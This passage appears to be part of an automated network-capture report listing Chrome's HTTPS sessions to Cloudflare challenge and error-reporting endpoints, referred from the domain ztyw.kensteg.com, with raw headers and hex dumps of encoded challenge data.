                                                                    2024-05-24 03:02:03 UTC2695OUTData Raw: 76 5f 38 38 38 61 30 62 36 33 30 65 64 39 38 63 31 62 3d 6d 52 79 56 71 56 61 37 33 68 78 31 79 6e 52 41 43 53 33 72 33 24 33 66 56 41 50 56 4b 61 30 35 31 41 33 46 2d 67 33 6d 30 6e 44 33 47 46 33 35 70 6f 45 77 43 76 33 59 33 64 56 4e 75 33 2d 61 33 6c 33 68 79 78 6c 33 6b 4d 53 72 67 33 6e 6b 6e 33 73 56 45 70 46 32 78 33 33 76 25 32 62 33 4c 30 78 59 33 2d 30 78 6e 33 58 62 46 79 63 79 33 6e 77 33 57 43 77 7a 67 30 2d 33 55 56 78 61 24 68 2b 4e 4c 38 33 45 68 47 46 51 32 6c 33 2d 36 46 4a 33 34 71 69 48 79 79 24 33 57 38 6b 54 2d 4d 53 41 6e 53 45 67 4b 30 24 6e 4d 70 76 6b 76 33 2d 31 79 41 51 33 37 4d 6c 33 6e 4b 33 53 52 33 72 56 33 46 33 6b 75 43 6e 6b 78 58 33 6b 47 53 50 78 5a 66 6b 31 37 4b 4a 37 55 74 24 34 55 71 4f 2d 2d 33 45 71 49 78 77 38
                                                                    Data Ascii: v_888a0b630ed98c1b=mRyVqVa73hx1ynRACS3r3$3fVAPVKa051A3F-g3m0nD3GF35poEwCv3Y3dVNu3-a3l3hyxl3kMSrg3nkn3sVEpF2x33v%2b3L0xY3-0xn3XbFycy3nw3WCwzg0-3UVxa$h+NL83EhGFQ2l3-6FJ34qiHyy$3W8kT-MSAnSEgK0$nMpvkv3-1yAQ37Ml3nK3SR3rV3F3kuCnkxX3kGSPxZfk17KJ7Ut$4UqO--3EqIxw8
                                                                    2024-05-24 03:02:03 UTC731INHTTP/1.1 200 OK
                                                                    Date: Fri, 24 May 2024 03:02:03 GMT
                                                                    Content-Type: text/plain; charset=UTF-8
                                                                    Content-Length: 120912
                                                                    Connection: close
                                                                    cf-chl-gen: VYq7nE4cRKjNAFaNW/G/d+1NhOijMd5KBZqOTQVwUfbYIm15r/RspL6dhhYUbfIYHXgVH8wBphvfFlH9fiS389vmij/1NDNWIf9HlcUM9E2icopc60a2JJA5N97e88J6p80dACL/57nHxyBGuYMuVmw5/I0QngsIsSKi4361LCRR+G04mGMwIar7hx15ug87fHsnbaSyDIAHCJZx6hB2X1qr2wPYhMgiwPWMKvi/4d2xYm9uA8QpwWNr1pyqY2gSUAn3DPYaIGKcSHjnTxm2LNJjjLaEkSooC2ws7pIKfABSgMr6IdgN3DrVgj9dKj2Fl5DPC6kM8fd5Osr3BcDH4Vahh7/Y/RgLe90O83x2bvCym1WfbcP0JVcR7jketS3AeieiAAYjrp3m6op4chqyT2a4AuXUAk0CYL42D4Gkxm9Yw6D+k2tejnW2x0AJdP6fr3LffaP26K/jLgYATclYWw==$RttNlukH02qiAi3B+tlAEA==
                                                                    Server: cloudflare
                                                                    CF-RAY: 888a0b701d3f1996-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-05-24 03:02:03 UTC638INData Raw: 71 6f 36 38 73 5a 78 38 72 4c 4f 36 75 59 52 2f 6a 72 4f 32 74 6f 65 66 69 71 53 48 75 70 76 48 70 36 36 73 71 59 32 4f 6f 61 4f 79 70 5a 65 31 33 74 32 73 32 71 2b 33 33 37 4b 2f 73 4d 53 6f 77 4b 76 45 76 73 37 6c 79 71 2f 65 77 64 4c 45 30 75 33 4c 79 2b 37 62 78 65 2f 7a 7a 4f 2f 56 33 4c 7a 7a 32 65 48 6b 38 4d 55 49 79 4f 55 45 44 4f 41 42 37 42 44 6b 42 65 34 49 41 52 6e 74 45 77 54 35 32 66 66 35 2b 77 76 31 37 41 2f 38 38 78 63 58 48 64 77 49 42 53 44 6f 43 77 30 61 42 41 30 65 38 51 38 34 46 43 51 49 42 52 30 78 47 42 6b 52 47 42 41 33 41 6a 55 6d 46 55 59 6f 50 78 6b 68 53 6b 63 6d 54 51 30 76 55 42 49 6d 49 6c 63 78 46 52 6f 54 54 43 63 33 4c 44 59 77 4f 7a 31 58 4a 6a 35 5a 52 46 31 64 58 6b 5a 47 50 45 42 71 5a 6c 42 4d 58 6c 55 76 61 55 52
                                                                    Data Ascii: qo68sZx8rLO6uYR/jrO2toefiqSHupvHp66sqY2OoaOypZe13t2s2q+337K/sMSowKvEvs7lyq/ewdLE0u3Ly+7bxe/zzO/V3Lzz2eHk8MUIyOUEDOAB7BDkBe4IARntEwT52ff5+wv17A/88xcXHdwIBSDoCw0aBA0e8Q84FCQIBR0xGBkRGBA3AjUmFUYoPxkhSkcmTQ0vUBImIlcxFRoTTCc3LDYwOz1XJj5ZRF1dXkZGPEBqZlBMXlUvaUR
                                                                    2024-05-24 03:02:03 UTC1369INData Raw: 65 4e 6b 31 57 4e 65 48 36 56 6a 56 35 2f 63 6f 4f 46 6c 4a 32 49 5a 36 57 4b 6d 35 36 50 63 4b 47 6f 6e 49 75 4e 61 62 47 72 70 4c 53 33 65 35 32 37 72 70 61 50 6e 70 53 6d 6c 5a 71 37 70 61 6d 34 6f 6f 69 46 68 5a 72 41 72 72 48 52 6f 4c 36 2f 79 63 76 43 6d 63 2b 59 32 62 47 30 7a 35 36 65 74 72 58 6b 30 4d 58 69 74 36 57 73 79 73 79 70 34 63 54 66 73 36 7a 78 73 2b 58 49 38 37 6e 63 2b 2f 59 41 30 4e 44 50 37 39 76 42 7a 2f 44 39 78 74 6e 34 43 65 6e 63 2f 67 2f 2b 79 77 66 62 42 41 6e 4e 41 68 49 4c 31 39 66 71 35 66 44 39 36 67 49 6b 48 43 44 37 37 67 49 56 4b 52 6f 63 41 79 49 65 2b 51 38 4f 49 2f 30 44 42 69 55 43 4c 44 67 70 42 6a 41 57 4c 51 6f 30 43 6a 45 4f 4e 30 51 31 45 6a 38 69 4f 52 5a 44 49 54 42 48 4a 6a 38 72 50 45 41 51 44 6b 59 59 55
                                                                    Data Ascii: eNk1WNeH6VjV5/coOFlJ2IZ6WKm56PcKGonIuNabGrpLS3e527rpaPnpSmlZq7pam4ooiFhZrArrHRoL6/ycvCmc+Y2bG0z56etrXk0MXit6Wsysyp4cTfs6zxs+XI87nc+/YA0NDP79vBz/D9xtn4Cenc/g/+ywfbBAnNAhIL19fq5fD96gIkHCD77gIVKRocAyIe+Q8OI/0DBiUCLDgpBjAWLQo0CjEON0Q1Ej8iORZDITBHJj8rPEAQDkYYU
                                                                    2024-05-24 03:02:03 UTC1369INData Raw: 42 6d 6d 79 63 6a 35 39 78 6d 33 52 2f 6f 4b 32 41 69 32 71 5a 5a 34 32 49 73 62 5a 32 67 36 2b 58 71 61 6c 34 69 4a 43 31 6a 38 4b 58 73 6f 4b 7a 70 49 4f 5a 6e 4d 4f 5a 68 72 37 42 77 59 79 6e 6b 72 54 4e 77 64 47 6b 75 63 33 61 32 4d 61 73 6d 74 71 37 77 64 71 78 30 64 75 2f 34 39 48 57 71 74 58 66 7a 73 58 63 7a 36 79 38 78 75 62 77 71 4b 2f 49 78 37 4f 37 74 4c 54 56 75 75 7a 57 37 2b 50 5a 35 67 50 59 34 62 2f 57 37 4f 48 6a 43 74 7a 65 32 2f 49 41 34 65 77 47 41 2b 73 43 37 4f 37 38 43 39 7a 37 36 78 37 78 42 64 62 36 46 51 45 44 46 68 33 33 41 74 38 74 41 66 6f 65 4d 51 50 39 44 69 41 78 39 79 67 70 43 66 73 37 4c 54 7a 79 47 45 51 39 44 6a 4d 61 51 52 4a 48 51 52 6b 4d 53 6c 42 4a 43 43 38 74 54 55 4d 65 4a 45 59 70 47 53 77 78 4f 56 49 37 54 42
                                                                    Data Ascii: Bmmycj59xm3R/oK2Ai2qZZ42IsbZ2g6+Xqal4iJC1j8KXsoKzpIOZnMOZhr7BwYynkrTNwdGkuc3a2Masmtq7wdqx0du/49HWqtXfzsXcz6y8xubwqK/Ix7O7tLTVuuzW7+PZ5gPY4b/W7OHjCtze2/IA4ewGA+sC7O78C9z76x7xBdb6FQEDFh33At8tAfoeMQP9DiAx9ygpCfs7LTzyGEQ9DjMaQRJHQRkMSlBJCC8tTUMeJEYpGSwxOVI7TB
                                                                    2024-05-24 03:02:03 UTC1369INData Raw: 69 59 6d 62 65 59 69 69 70 6e 75 66 67 4a 4e 75 6f 4b 36 79 62 35 61 55 6b 49 71 47 6d 4c 4f 51 69 35 47 73 67 73 43 65 70 4a 36 49 78 36 6e 42 6e 4c 76 45 6d 6f 2b 71 7a 4c 43 47 77 71 32 6d 73 74 62 4e 72 4d 32 6c 7a 70 37 63 75 73 43 36 70 4f 50 46 33 62 65 66 75 63 48 74 72 65 54 59 76 64 37 6e 39 50 4f 73 30 62 50 53 32 66 6a 4d 2b 64 44 77 33 50 47 33 37 4e 44 42 7a 2b 57 2b 76 39 37 5a 42 4d 4d 49 7a 66 6a 64 2f 67 67 56 46 4d 7a 31 30 2f 4c 35 47 65 30 61 38 42 48 38 45 74 63 4e 38 4f 48 76 46 4f 54 6a 32 77 49 45 35 79 30 4f 43 4f 66 77 4d 42 7a 73 44 43 6b 68 42 68 55 59 43 67 67 54 48 41 38 56 44 68 77 50 4e 43 55 33 50 77 49 54 47 44 59 34 49 55 59 4c 50 44 45 2f 48 6b 45 52 4d 53 4a 48 46 43 78 4c 57 79 78 58 55 44 46 4d 4c 31 63 69 52 79 5a
                                                                    Data Ascii: iYmbeYiipnufgJNuoK6yb5aUkIqGmLOQi5GsgsCepJ6Ix6nBnLvEmo+qzLCGwq2mstbNrM2lzp7cusC6pOPF3befucHtreTYvd7n9POs0bPS2fjM+dDw3PG37NDBz+W+v97ZBMMIzfjd/ggVFMz10/L5Ge0a8BH8EtcN8OHvFOTj2wIE5y0OCOfwMBzsDCkhBhUYCggTHA8VDhwPNCU3PwITGDY4IUYLPDE/HkERMSJHFCxLWyxXUDFML1ciRyZ
                                                                    2024-05-24 03:02:03 UTC1369INData Raw: 59 61 52 61 32 70 38 71 72 61 78 74 61 32 68 6a 71 61 6e 74 70 71 39 74 35 69 55 65 73 53 31 6b 4b 53 52 79 61 6a 4a 69 4a 71 62 72 4a 72 4f 71 4a 4f 53 6f 36 65 74 7a 72 69 59 78 64 69 6f 6d 4e 72 41 31 64 4c 53 30 64 6a 41 79 4d 6a 64 79 36 6e 59 79 75 58 47 33 36 76 42 37 64 4c 69 7a 2f 54 46 2b 73 72 78 74 38 62 53 76 38 76 61 2f 64 48 64 38 64 33 39 38 66 49 4c 77 38 6a 36 31 2f 37 4e 30 64 37 54 37 4e 44 32 43 75 55 48 34 77 37 76 33 50 33 65 2f 42 58 65 42 51 59 66 33 2f 4c 6e 47 79 44 39 46 68 77 6f 2f 65 63 62 4d 51 59 6d 2f 51 49 53 4e 2f 6b 73 4c 44 73 71 4c 67 6f 68 45 53 77 37 51 43 55 66 4d 44 51 45 41 6a 6f 4d 52 79 39 4e 53 41 30 30 45 45 77 78 4a 77 6f 51 4e 56 49 6e 46 6a 68 56 54 79 74 43 57 79 35 64 55 46 38 65 55 55 5a 68 4c 43 70 4b
                                                                    Data Ascii: YaRa2p8qraxta2hjqantpq9t5iUesS1kKSRyajJiJqbrJrOqJOSo6etzriYxdiomNrA1dLS0djAyMjdy6nYyuXG36vB7dLiz/TF+srxt8bSv8va/dHd8d398fILw8j61/7N0d7T7ND2CuUH4w7v3P3e/BXeBQYf3/LnGyD9Fhwo/ecbMQYm/QISN/ksLDsqLgohESw7QCUfMDQEAjoMRy9NSA00EEwxJwoQNVInFjhVTytCWy5dUF8eUUZhLCpK
                                                                    2024-05-24 03:02:03 UTC1369INData Raw: 36 53 63 48 57 6b 64 6e 69 73 75 6f 71 66 65 72 32 30 6c 35 32 4e 75 48 2b 62 6c 4c 6d 5a 6e 37 36 75 79 4b 6d 74 6a 4b 61 71 74 63 2b 67 31 74 43 7a 73 4e 4f 5a 33 74 4c 53 33 70 75 30 6e 2b 47 2b 31 74 62 63 78 4d 72 4b 79 2b 58 4f 30 65 54 74 30 4f 43 74 39 65 72 5a 36 72 54 30 32 63 76 58 39 76 36 35 2f 74 72 51 37 63 58 39 41 4d 55 4d 38 77 48 2b 34 2f 77 51 36 65 6a 50 35 66 34 50 31 77 58 7a 30 51 37 58 35 2f 66 77 38 64 72 5a 39 69 50 35 45 2f 44 2b 38 67 59 41 2f 41 63 4f 47 51 4d 68 44 78 4d 44 42 65 34 79 38 7a 54 31 4b 79 6b 78 47 52 59 69 4e 7a 59 6b 4d 67 49 65 51 69 67 33 4d 78 68 4b 46 69 41 70 43 42 6f 6e 43 6b 59 2b 4f 43 31 45 56 54 55 53 55 69 73 39 55 56 4a 50 47 68 70 58 51 57 4a 6f 58 6c 4a 58 57 46 68 6e 53 33 42 6f 53 55 55 72 64
                                                                    Data Ascii: 6ScHWkdnisuoqfer20l52NuH+blLmZn76uyKmtjKaqtc+g1tCzsNOZ3tLS3pu0n+G+1tbcxMrKy+XO0eTt0OCt9erZ6rT02cvX9v65/trQ7cX9AMUM8wH+4/wQ6ejP5f4P1wXz0Q7X5/fw8drZ9iP5E/D+8gYA/AcOGQMhDxMDBe4y8zT1KykxGRYiNzYkMgIeQig3MxhKFiApCBonCkY+OC1EVTUSUis9UVJPGhpXQWJoXlJXWFhnS3BoSUUrd
                                                                    2024-05-24 03:02:03 UTC1369INData Raw: 4d 65 62 2b 6e 75 61 4b 42 77 48 75 45 6d 71 4c 48 79 4d 43 59 6a 4b 33 48 79 35 2b 62 6b 59 6e 56 74 4d 37 52 7a 73 72 4b 32 4e 4b 59 72 62 57 63 77 74 66 56 30 4e 76 47 30 2b 54 56 78 39 33 66 79 37 7a 51 34 4b 66 71 73 2b 47 39 39 4f 7a 56 75 4e 54 78 32 37 7a 55 30 77 48 53 38 74 2f 6c 34 63 2f 52 2f 64 50 6a 77 63 7a 6b 36 75 54 6c 36 2b 49 55 36 51 48 76 41 52 63 44 43 2f 66 32 32 64 63 55 46 64 37 38 41 52 73 54 33 69 4d 46 46 4f 55 46 41 41 49 45 4a 77 4d 45 4e 43 6b 71 42 54 41 51 47 69 49 32 46 50 49 37 48 68 45 71 41 6a 77 31 45 79 59 2f 47 54 38 7a 54 44 59 6b 53 45 49 50 45 53 74 48 4a 6a 59 6e 55 69 30 32 54 46 59 34 50 6a 73 72 57 31 45 67 4c 31 34 6b 55 6d 63 31 51 7a 78 6d 4f 6b 6c 47 51 43 70 42 4a 45 31 45 51 44 38 75 54 6d 39 6b 64 6e
                                                                    Data Ascii: Meb+nuaKBwHuEmqLHyMCYjK3Hy5+bkYnVtM7RzsrK2NKYrbWcwtfV0NvG0+TVx93fy7zQ4Kfqs+G99OzVuNTx27zU0wHS8t/l4c/R/dPjwczk6uTl6+IU6QHvARcDC/f22dcUFd78ARsT3iMFFOUFAAIEJwMENCkqBTAQGiI2FPI7HhEqAjw1EyY/GT8zTDYkSEIPEStHJjYnUi02TFY4PjsrW1EgL14kUmc1QzxmOklGQCpBJE1EQD8uTm9kdn
                                                                    2024-05-24 03:02:03 UTC1369INData Raw: 65 36 36 32 65 49 53 70 75 5a 54 48 78 35 37 4a 74 38 2b 4d 72 59 75 78 71 4d 6a 4a 31 64 4c 5a 6c 36 2f 64 75 64 61 79 75 74 6a 59 74 71 37 47 35 37 4c 70 79 61 66 41 76 65 2b 74 78 4d 72 62 77 63 76 66 76 75 54 47 32 65 33 54 75 73 2f 5a 79 39 44 42 34 66 44 54 75 2f 7a 68 43 74 62 45 79 64 7a 6f 36 4f 55 43 33 77 55 4b 37 64 30 4a 38 65 6f 62 37 68 7a 75 48 2b 2f 73 2b 42 30 56 39 65 44 76 38 75 4d 6a 38 53 76 37 47 51 6b 58 42 50 6b 78 36 2b 77 4e 39 52 55 6a 45 52 6b 47 4f 51 67 4e 46 67 30 36 2b 67 4d 73 50 7a 70 49 43 43 63 4a 47 41 4e 4f 53 45 31 48 53 55 77 74 48 54 4d 75 52 69 77 7a 4a 55 39 5a 4b 31 55 59 47 44 4d 69 4c 55 38 37 52 54 4a 6d 51 56 51 7a 56 6c 67 6c 4b 30 63 78 59 45 70 48 50 57 5a 77 61 6c 5a 6e 54 31 30 35 54 54 73 2f 66 57 78
                                                                    Data Ascii: e662eISpuZTHx57Jt8+MrYuxqMjJ1dLZl6/dudayutjYtq7G57LpyafAve+txMrbwcvfvuTG2e3Tus/Zy9DB4fDTu/zhCtbEydzo6OUC3wUK7d0J8eob7hzuH+/s+B0V9eDv8uMj8Sv7GQkXBPkx6+wN9RUjERkGOQgNFg06+gMsPzpICCcJGANOSE1HSUwtHTMuRiwzJU9ZK1UYGDMiLU87RTJmQVQzVlglK0cxYEpHPWZwalZnT105TTs/fWx
                                                                    2024-05-24 03:02:03 UTC1369INData Raw: 4c 53 32 76 61 69 76 6c 36 53 44 75 6f 2b 4d 7a 61 6d 75 71 4d 4f 31 70 4e 79 33 71 37 61 64 74 4e 4c 57 75 74 43 79 33 72 62 71 6f 37 2f 55 71 61 62 4d 35 38 43 70 32 2b 7a 6d 30 2b 50 71 35 38 61 78 38 64 54 71 2b 62 71 37 41 4c 33 68 2b 39 66 46 30 63 6e 6f 33 74 7a 46 32 2f 6e 61 36 4d 33 67 35 76 49 49 42 78 50 6f 39 66 6a 59 31 77 37 33 39 66 77 64 34 68 54 37 4a 78 49 44 4b 50 66 7a 37 4e 38 73 47 52 6f 50 44 69 41 66 46 41 45 67 4b 54 6e 33 4e 2b 34 72 4d 7a 34 61 2b 76 6b 31 51 54 41 76 45 53 45 62 54 41 6b 36 4c 69 6f 34 44 55 30 4d 43 68 52 4c 4a 69 46 58 4f 7a 51 78 55 78 74 58 55 46 59 2f 4f 7a 45 37 48 54 67 39 4a 45 6b 34 50 56 59 2f 57 6c 34 6f 55 55 46 4a 58 57 4e 67 4c 31 46 6b 54 56 68 62 5a 6c 31 71 65 56 4e 72 63 48 78 39 67 32 55 2f
                                                                    Data Ascii: LS2vaivl6SDuo+MzamuqMO1pNy3q7adtNLWutCy3rbqo7/UqabM58Cp2+zm0+Pq58ax8dTq+bq7AL3h+9fF0cno3tzF2/na6M3g5vIIBxPo9fjY1w739fwd4hT7JxIDKPfz7N8sGRoPDiAfFAEgKTn3N+4rMz4a+vk1QTAvESEbTAk6Lio4DU0MChRLJiFXOzQxUxtXUFY/OzE7HTg9JEk4PVY/Wl4oUUFJXWNgL1FkTVhbZl1qeVNrcHx9g2U/


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    15192.168.2.164973035.190.80.14432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-24 03:02:03 UTC537OUTOPTIONS /report/v4?s=F2gwpimc%2Br6phS3zMmiPRXXd1zlhEaJyTFIta4sffFZTO2%2FucZQfsyOiLTVAj%2FbjfUOzyAy5LmBY1GB14dsFOApWm6tIzoHLmhlmQwERwuI7YrCT1%2BJOhgB7c1PYvw%3D%3D HTTP/1.1
                                                                    Host: a.nel.cloudflare.com
                                                                    Connection: keep-alive
                                                                    Origin: https://ztyw.kensteg.com
                                                                    Access-Control-Request-Method: POST
                                                                    Access-Control-Request-Headers: content-type
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-05-24 03:02:03 UTC336INHTTP/1.1 200 OK
                                                                    content-length: 0
                                                                    access-control-max-age: 86400
                                                                    access-control-allow-methods: OPTIONS, POST
                                                                    access-control-allow-origin: *
                                                                    access-control-allow-headers: content-type, content-length
                                                                    date: Fri, 24 May 2024 03:02:03 GMT
                                                                    Via: 1.1 google
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    16192.168.2.164973335.190.80.14432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-24 03:02:04 UTC478OUTPOST /report/v4?s=F2gwpimc%2Br6phS3zMmiPRXXd1zlhEaJyTFIta4sffFZTO2%2FucZQfsyOiLTVAj%2FbjfUOzyAy5LmBY1GB14dsFOApWm6tIzoHLmhlmQwERwuI7YrCT1%2BJOhgB7c1PYvw%3D%3D HTTP/1.1
                                                                    Host: a.nel.cloudflare.com
                                                                    Connection: keep-alive
                                                                    Content-Length: 430
                                                                    Content-Type: application/reports+json
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-05-24 03:02:04 UTC430OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 33 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 7a 74 79 77 2e 6b 65 6e 73 74 65 67 2e 63 6f 6d 2f 38 32 6a 50 49 4f 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 35 33 2e 31 37 38 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72
                                                                    Data Ascii: [{"age":0,"body":{"elapsed_time":133,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://ztyw.kensteg.com/82jPIO/","sampling_fraction":1.0,"server_ip":"172.67.153.178","status_code":404,"type":"http.error"},"type":"network-error
                                                                    2024-05-24 03:02:04 UTC168INHTTP/1.1 200 OK
                                                                    content-length: 0
                                                                    date: Fri, 24 May 2024 03:02:03 GMT
                                                                    Via: 1.1 google
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    17192.168.2.1649734104.17.3.1844432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-24 03:02:04 UTC486OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/204239232:1716516640:z1Q-82SQEC5453QrRVJiA-W088EwWom7wzPnNIq-U9k/888a0b630ed98c1b/0cc0942b0c543ec HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-05-24 03:02:04 UTC375INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 24 May 2024 03:02:04 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 7
                                                                    Connection: close
                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                    cf-chl-out: qY8Z6JkBe7UM2d2WwNlxgA==$U6oLTx27CXzgA0glH+g+Dw==
                                                                    Server: cloudflare
                                                                    CF-RAY: 888a0b769a588ca8-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-05-24 03:02:04 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                    Data Ascii: invalid


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    18192.168.2.1649736104.17.2.1844432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-24 03:02:04 UTC804OUTGET /cdn-cgi/challenge-platform/h/b/pat/888a0b630ed98c1b/1716519723558/23a64c74843c301532d921809f7da6984544686c1badac72581a7b16a07a776c/JAENOqaIJs85Hu6 HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    Cache-Control: max-age=0
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: same-origin
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/cr37t/0x4AAAAAAAXRTsOVR7YNTKTk/auto/normal
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-05-24 03:02:04 UTC143INHTTP/1.1 401 Unauthorized
                                                                    Date: Fri, 24 May 2024 03:02:04 GMT
                                                                    Content-Type: text/plain; charset=UTF-8
                                                                    Content-Length: 1
                                                                    Connection: close
                                                                    2024-05-24 03:02:04 UTC1382INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 49 36 5a 4d 64 49 51 38 4d 42 55 79 32 53 47 41 6e 33 32 6d 6d 45 56 45 61 47 77 62 72 61 78 79 57 42 70 37 46 71 42 36 64 32 77 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                    Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gI6ZMdIQ8MBUy2SGAn32mmEVEaGwbraxyWBp7FqB6d2wAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                    2024-05-24 03:02:04 UTC1INData Raw: 4a
                                                                    Data Ascii: J


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    19192.168.2.1649737104.17.2.1844432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-24 03:02:05 UTC775OUTGET /cdn-cgi/challenge-platform/h/b/i/888a0b630ed98c1b/1716519723558/wlYn9sv82zuVieG HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                    Sec-Fetch-Site: same-origin
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: image
                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/cr37t/0x4AAAAAAAXRTsOVR7YNTKTk/auto/normal
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-05-24 03:02:05 UTC200INHTTP/1.1 200 OK
                                                                    Date: Fri, 24 May 2024 03:02:05 GMT
                                                                    Content-Type: image/png
                                                                    Content-Length: 61
                                                                    Connection: close
                                                                    Server: cloudflare
                                                                    CF-RAY: 888a0b7ceeb042e3-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-05-24 03:02:05 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 4c 00 00 00 5f 08 02 00 00 00 cd b7 b6 49 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                    Data Ascii: PNGIHDRL_IIDAT$IENDB`


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    20192.168.2.1649738104.17.3.1844432312C:\Program Files\Google\Chrome\Application\chrome.exe
